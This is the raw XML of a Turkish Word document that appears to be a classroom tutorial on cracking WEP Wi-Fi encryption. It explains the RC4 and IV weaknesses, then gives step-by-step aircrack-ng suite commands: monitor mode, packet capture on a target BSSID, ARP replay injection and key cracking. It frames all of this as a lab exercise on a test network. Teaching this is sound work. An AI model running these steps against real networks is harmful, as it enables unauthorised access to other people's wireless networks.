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0646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🔎</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77437">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. WEP Nedir?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B79BE6" w14:textId="77777777" w:rsidR="00F77437" w:rsidRPr="00F77437" w:rsidRDefault="00F77437" w:rsidP="00F77437">
      <w:r w:rsidRPr="00F77437">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WEP (Wired Equivalent Privacy)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77437">
        <w:t>, kablosuz ağları korumak için geliştirilen eski bir güvenlik protokolüdür.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE492AF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RC4 algoritması</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77437">
        <w:t xml:space="preserve"> ile veri şifreler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDC0C08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IV (Initialization Vector)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77437">
        <w:t xml:space="preserve"> adı verilen rastgele sayı üreticisi kullanır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC65B2E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>Ancak IV’ler kısa (24 bit) ve tekrarlıdır. Bu da şifrelemenin kırılmasını kolaylaştırır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A4F077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 xml:space="preserve">Günümüzde güvensiz kabul edilir ve yerini </w:t>
      </w:r>
      <w:r w:rsidRPr="00F77437">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WPA/WPA2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77437">
        <w:t xml:space="preserve"> almıştır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A9EFB5" w14:textId="77777777" w:rsidR="00F77437" w:rsidRPr="00F77437" w:rsidRDefault="00000000" w:rsidP="00F77437">
      <w:r>
        <w:pict w14:anchorId="441863D2">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="625DAA8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🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77437">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. WEP’e Neden Saldırı Yapılır?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E62CFBC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WEP, zayıf yapısından dolayı </w:t>
      </w:r>
      <w:r w:rsidRPr="00F77437">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>kısa sürede kırılabilir</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77437">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC833F7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>Gerçek saldırganlar tarafından kötüye kullanılabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7E6E4F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Biz bu saldırıyı </w:t>
      </w:r>
      <w:r w:rsidRPr="00F77437">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>eğitim amacıyla</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77437">
        <w:t>, şifreleme teknolojilerinin evrimini anlamak için inceliyoruz.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035AB5FA" w14:textId="77777777" w:rsidR="00F77437" w:rsidRPr="00F77437" w:rsidRDefault="00000000" w:rsidP="00F77437">
      <w:r>
        <w:pict w14:anchorId="76BA37F7">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A03F33D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🧰</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77437">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. Kullanılan Araçlar (Kali Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14974693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airmon-ng → Kablosuz kartı monitor moduna alır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7B3FF6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airodump-ng → Ağları ve trafiği izler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35516994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aireplay-ng → Paket enjeksiyonu ile veri üretir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4C28DD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aircrack-ng → Toplanan verilerden WEP şifresini kırar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AEF4F7" w14:textId="21010C43" w:rsidR="00BE03F6" w:rsidRDefault="00BE03F6">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F1C9899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🌸</w:t>
      </w:r>
      <w:r w:rsidRPr="00960F00">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00960F00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Kurulum (Genelde yüklüdür)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061ABFA8" w14:textId="77777777" w:rsidR="00960F00" w:rsidRPr="00960F00" w:rsidRDefault="00960F00" w:rsidP="00960F00">
      <w:r w:rsidRPr="00960F00">
        <w:t xml:space="preserve">sudo apt-get update  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B373605" w14:textId="77777777" w:rsidR="00960F00" w:rsidRPr="00960F00" w:rsidRDefault="00960F00" w:rsidP="00960F00">
      <w:r w:rsidRPr="00960F00">
        <w:t>sudo apt-get install aircrack-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8C4628" w14:textId="77777777" w:rsidR="00960F00" w:rsidRDefault="00960F00"/>
    <w:p w14:paraId="555BDF9A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🛠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00960F00">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00960F00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Adım Adım WEP Saldırısı</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409E0730" w14:textId="77777777" w:rsidR="00960F00" w:rsidRPr="00960F00" w:rsidRDefault="00960F00" w:rsidP="00960F00">
      <w:r w:rsidRPr="00960F00">
        <w:pict w14:anchorId="575DE3B8">
          <v:rect id="_x0000_i1057" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09869A07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🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00960F00">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00960F00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Adım 1: Monitor modunu aktif et</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A24D21" w14:textId="77777777" w:rsidR="00960F00" w:rsidRPr="00960F00" w:rsidRDefault="00960F00" w:rsidP="00960F00">
      <w:r w:rsidRPr="00960F00">
        <w:t>airmon-ng start wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D75A01C" w14:textId="77777777" w:rsidR="00960F00" w:rsidRPr="00960F00" w:rsidRDefault="00960F00" w:rsidP="00960F00">
      <w:r w:rsidRPr="00960F00">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="47F5F5F7">
          <v:rect id="_x0000_i1058" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="548C4A0F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🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00960F00">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00960F00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Adım 2: WEP ağı bul</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAAC421" w14:textId="77777777" w:rsidR="00960F00" w:rsidRPr="00960F00" w:rsidRDefault="00960F00" w:rsidP="00960F00">
      <w:r w:rsidRPr="00960F00">
        <w:t>airodump-ng wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34330C57" w14:textId="77777777" w:rsidR="00960F00" w:rsidRPr="00960F00" w:rsidRDefault="00960F00" w:rsidP="00960F00">
      <w:r w:rsidRPr="00960F00">
        <w:t>BSSID ve kanal numarası not edilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256D4418" w14:textId="77777777" w:rsidR="00960F00" w:rsidRPr="00960F00" w:rsidRDefault="00960F00" w:rsidP="00960F00">
      <w:r w:rsidRPr="00960F00">
        <w:pict w14:anchorId="41E9E2B1">
          <v:rect id="_x0000_i1059" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDA0211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🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00960F00">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00960F00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Adım 3: Hedef ağa odaklan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15430185" w14:textId="77777777" w:rsidR="00960F00" w:rsidRPr="00960F00" w:rsidRDefault="00960F00" w:rsidP="00960F00">
      <w:r w:rsidRPr="00960F00">
        <w:t>airodump-ng --bssid [BSSID] -c [KANAL] -w wep_kayit wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469E07A2" w14:textId="77777777" w:rsidR="00960F00" w:rsidRPr="00960F00" w:rsidRDefault="00960F00" w:rsidP="00960F00">
      <w:r w:rsidRPr="00960F00">
        <w:pict w14:anchorId="44AA7199">
          <v:rect id="_x0000_i1060" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3797B429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🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00960F00">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00960F00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Adım 4: ARP paketleri üret (trafik artır)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD844F9" w14:textId="77777777" w:rsidR="00960F00" w:rsidRPr="00960F00" w:rsidRDefault="00960F00" w:rsidP="00960F00">
      <w:r w:rsidRPr="00960F00">
        <w:t>aireplay-ng --arpreplay -b [BSSID] -h [Kendi_MAC] wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDAC1E6" w14:textId="77777777" w:rsidR="00960F00" w:rsidRPr="00960F00" w:rsidRDefault="00960F00" w:rsidP="00960F00">
      <w:r w:rsidRPr="00960F00">
        <w:pict w14:anchorId="59D4D77E">
          <v:rect id="_x0000_i1061" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4D6C4C" w14:textId="77777777" w:rsidR="00960F00" w:rsidRPr="00960F00" w:rsidRDefault="00960F00" w:rsidP="00960F00">
      <w:r w:rsidRPr="00960F00">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00960F00">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00960F00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Adım 5: WEP şifresini kır</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD585E5" w14:textId="77777777" w:rsidR="00960F00" w:rsidRPr="00960F00" w:rsidRDefault="00960F00" w:rsidP="00960F00">
      <w:r w:rsidRPr="00960F00">
        <w:t>aircrack-ng wep_kayit-01.cap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437E83D3" w14:textId="77777777" w:rsidR="00960F00" w:rsidRPr="00960F00" w:rsidRDefault="00960F00" w:rsidP="00960F00">
      <w:r w:rsidRPr="00960F00">
        <w:t>Yeterli IV toplandığında şifre kolaylıkla kırılır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD4EA1B" w14:textId="22F7A865" w:rsidR="00F77437" w:rsidRDefault="00F77437"/>
    <w:p w14:paraId="0596C856" w14:textId="77777777" w:rsidR="00F77437" w:rsidRDefault="00F77437"/>
    <w:p w14:paraId="2E247A9C" w14:textId="77777777" w:rsidR="00F77437" w:rsidRDefault="00F77437"/>
    <w:p w14:paraId="47E3F516" w14:textId="78DE154B" w:rsidR="00F77437" w:rsidRDefault="00F77437">
      <w:r w:rsidRPr="00F77437">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AE3E0B1" wp14:editId="790C2969">
            <wp:extent cx="5760720" cy="1109980"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="131788614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614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DC2" w14:textId="72FB7202" w:rsidR="00F77437" w:rsidRDefault="00F77437">
      <w:r>
        <w:t>Örnek komut</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD8C8C3" w14:textId="77777777" w:rsidR="00F77437" w:rsidRDefault="00F77437"/>
    <w:p w14:paraId="2DC8B156" w14:textId="77777777" w:rsidR="00F77437" w:rsidRDefault="00F77437"/>
    <w:p w14:paraId="33B039D1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🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77437">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 6. Uygulama Senaryosu (Sınıf Ortamı)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA6E770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rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Test amacıyla WEP şifreli bir ağ kurulur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4009655E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Öğrenciler yukarıdaki adımları uygular.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43828B09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 şifresi çözülür.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021CA17B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lastRenderedPageBreak/>
        <w:t>WEP’in neden artık kullanılmadığı teknik olarak gösterilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE390E9" w14:textId="77777777" w:rsidR="00F77437" w:rsidRDefault="00F77437"/>
    <w:p w14:paraId="2A9B6654" w14:textId="77777777" w:rsidR="00F77437" w:rsidRDefault="00F77437"/>
    <w:p w14:paraId="6FC17ED0" w14:textId="0884C76E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🎓</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77437">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00960F00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77437">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>. Sonuç</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2AF70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WEP artık güvensizdir ve kullanılmamalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2452F4E6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Zayıf şifreleme yöntemleri hızla kırılabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D89E80F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Öğrenciler uygulama ile WEP’in zaaflarını deneyimler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E984C6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Modern güvenlik protokollerinin (WPA2, WPA3) önemini kavrar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02323BC5" w14:textId="77777777" w:rsidR="00F77437" w:rsidRDefault="00F77437"/>
    <w:sectPr w:rsidR="00F7743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2007"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D92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84D21"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5BC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4E8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5C8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74A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B4A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4556"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="65D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206690">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1980568749">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2136440451">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="150870898">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="159169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F6"/>
    <w:rsid w:val="00960F00"/>
    <w:rsid w:val="00BE03F6"/>
    <w:rsid w:val="00E83C9A"/>
    <w:rsid w:val="00F12A63"/>
    <w:rsid w:val="00F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D0A6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F904A5EE-0593-4FC1-A3AC-ACA9F97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03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03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03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03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03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03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03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03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03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03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0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2025-07-22T18:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-28T13:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>